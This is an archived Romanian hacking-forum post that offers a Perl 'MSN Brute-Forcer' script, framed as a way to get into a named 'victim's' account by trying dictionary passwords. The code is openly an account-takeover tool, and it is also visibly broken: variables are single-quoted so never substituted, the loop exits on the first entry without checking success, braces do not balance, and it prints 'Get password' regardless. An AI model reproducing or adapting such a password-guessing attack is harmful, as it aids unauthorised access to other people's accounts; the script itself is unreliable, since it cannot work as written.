WWW.UNKNOWNS.RO
WWW.UNKNOWNS.RO
Lista Forumurilor Pe Tematici
WWW.UNKNOWNS.RO | Reguli | Inregistrare | Login

POZE WWW.UNKNOWNS.RO

Nu sunteti logat.
Nou pe simpatie:
deeazuzu82
Femeie
24 ani
Cluj
cauta Barbat
27 - 62 ani
WWW.UNKNOWNS.RO / Hacking Programs / [PERL] Msn Brute-Forcer Moderat de florineatza, zerich25, zpetry
Autor
Mesaj Pagini: 1
VIRUS
WWW.UNKNOWNS.RO

Din: WWW.UNKNOWNS.RO
Inregistrat: acum 18 ani
Postari: 3176
A brute force perl script for MSN. COuld be useful, if you know the futur-victim well.

Code:

Author : m0x.lk, ~HaSe & RE.
Info : Original code in spanish. Translated by ~p3ri0d.



Code:

#!/usr/bin/perl

system ("clear");

system ("cls");

system ("color fc");

# Re-c0de by m0x.lk

# Edit : BruteMSN .- ~HaSe & RE.

# Translation : ~p3ri0d.

# Download Lib's.

use lib qw(./MSN/lib);

use MSN;

use strict;

use encoding "euc-jp";

print "Re-C0de by m0x.lk\n";

print "\n";

print "BruteMSN .- ~HaSe & RE.\n";

print "\n";

print "Translated by ~p3ri0d.\n";

print "\n";

sleep 1;

print "Victim: ";

$victima=<STDIN>;

print "\n\n";

print "\n";

print "Dictionary: ";

$dict=<STDIN>;

print "\n\n";

open (D,"<$dict") or die "Dictionary not found\n";

while(<D>)

{

$try = $_;

    chomp $try;

my $msn = MSN->new(Handle => '$victima',

                   Password => '$try');

    $counter++;

    $tiempo++;

    {

        print "$victima / $try \n";

        last;

    }

    if($counter==$fallos)

    {

}

close(D);

print "\n\n";

print "$tiempo Get password";

print "\n\n";

print "c0dex by m0x.lk";



_______________________________________


pus acum 18 ani
   
Pagini: 1  

Mergi la